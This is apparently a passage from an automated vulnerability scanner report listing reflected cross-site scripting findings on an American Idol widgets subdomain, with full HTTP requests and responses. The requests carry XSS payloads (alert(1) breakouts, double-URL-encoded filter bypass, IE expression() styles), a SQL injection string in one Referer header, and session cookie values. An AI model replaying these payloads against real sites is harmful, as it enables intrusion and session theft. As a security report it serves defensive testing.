Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.1.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:07:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:48 GMT
Content-Length: 1363
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/redirect.one?redirect_to=http://www.americanidol.com/c05ca'><script>alert(1)</script>4c9652dc110'>
...[SNIP]...

1.96. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c was submitted in the REST URL parameter 1. This input was echoed as d1e02';alert(1)//fadcf0d5e4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsd1e02%2527%253balert%25281%2529%252f%252ffadcf0d5e4c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsd1e02';alert(1)//fadcf0d5e4c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsd1e02';alert(1)//fadcf0d5e4c/'"-->
...[SNIP]...

1.97. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f31bd%253balert%25281%2529%252f%252f4dfd4995b75 was submitted in the REST URL parameter 1. This input was echoed as f31bd;alert(1)//4dfd4995b75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf31bd%253balert%25281%2529%252f%252f4dfd4995b75/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4152
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf31bd;alert(1)//4dfd4995b75/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect
...[SNIP]...

1.98. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c was submitted in the REST URL parameter 1. This input was echoed as 1c337";alert(1)//0f1dd352c7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools1c337%2522%253balert%25281%2529%252f%252f0f1dd352c7c/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4170
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools1c337";alert(1)//0f1dd352c7c/'"--></style><_script>html_removednetsparker(0x000051)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirec
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools1c337";alert(1)//0f1dd352c7c/'"-->
...[SNIP]...

1.99. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bea22%2527%253balert%25281%2529%252f%252f4e19821fe3b was submitted in the REST URL parameter 1. This input was echoed as bea22';alert(1)//4e19821fe3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsbea22%2527%253balert%25281%2529%252f%252f4e19821fe3b/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3994
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:09 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           doc
...[SNIP]...
some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_) {
                   setTimeout(oneWidgetWaitForCookie_toolsbea22';alert(1)//4e19821fe3b_Netsparkerdcf8046f3ca84302a46153adee19582b_, 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAl
...[SNIP]...

1.100. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/Netsparkerdcf8046f3ca84302a46153adee19582b/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f2835%253balert%25281%2529%252f%252f2a7b9c1de45 was submitted in the REST URL parameter 1. This input was echoed as f2835;alert(1)//2a7b9c1de45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf2835%253balert%25281%2529%252f%252f2a7b9c1de45/Netsparkerdcf8046f3ca84302a46153adee19582b/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3976
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf2835;alert(1)//2a7b9c1de45_Netsparkerdcf8046f3ca84302a46153adee19582b_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           docu
...[SNIP]...

1.101. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6 was submitted in the REST URL parameter 1. This input was echoed as efafb<x style=x:expr/**/ession(alert(1))>adba755e1d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /toolsefafb<x%20style%3dx%3aexpr/**/ession(alert(1))>adba755e1d6/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4032
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsefafb<x style=x:expr/**/ession(alert(1))>adba755e1d6_jwk...u......^r...(...{_() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
               
...[SNIP]...

1.102. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1 was submitted in the REST URL parameter 1. This input was echoed as 35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tools35ae1<x%20style%3dx%3aexpr/**/ession(alert(1))>6ba37e770d1/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD HTTP/1.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4140
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:49 GMT
Connection: close

       function oneWidgetWaitForCookie_tools35ae1<x style=x:expr/**/ession(alert(1))>6ba37e770d1_jwk...u......^r...(...{_...w....() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect butt
...[SNIP]...

1.103. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7 was submitted in the REST URL parameter 1. This input was echoed as fd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /toolsfd987<x%20style%3dx%3aexpr/**/ession(alert(1))>f3d34dfffb7/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4516
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:33:03 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsfd987<x style=x:expr/**/ession(alert(1))>f3d34dfffb7/jwk...u......^r...(...{_Netsparker8f4d94ef206e4e3b82c23a8a89d01567_() {
           ckCntr++;
           if (ckCntr > 12)
...[SNIP]...

1.104. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 51aed%253balert%25281%2529%252f%252f31e4ba16cf was submitted in the REST URL parameter 1. This input was echoed as 51aed;alert(1)//31e4ba16cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools51aed%253balert%25281%2529%252f%252f31e4ba16cf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4262
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:31 GMT
Connection: close

       function oneWidgetWaitForCookie_tools51aed;alert(1)//31e4ba16cf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Sh
...[SNIP]...

1.105. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f67%2522%253balert%25281%2529%252f%252f718932c3ebf was submitted in the REST URL parameter 1. This input was echoed as f3f67";alert(1)//718932c3ebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsf3f67%2522%253balert%25281%2529%252f%252f718932c3ebf/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:29 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_toolsf3f67";alert(1)//718932c3ebf/keyslave.one'"-->
...[SNIP]...

1.106. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575 was submitted in the REST URL parameter 1. This input was echoed as 96f76';alert(1)//d1bbe2ce575 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"-->
...[SNIP]...

1.107. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f41%2527%253balert%25281%2529%252f%252f79209a69875 was submitted in the REST URL parameter 1. This input was echoed as 40f41';alert(1)//79209a69875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

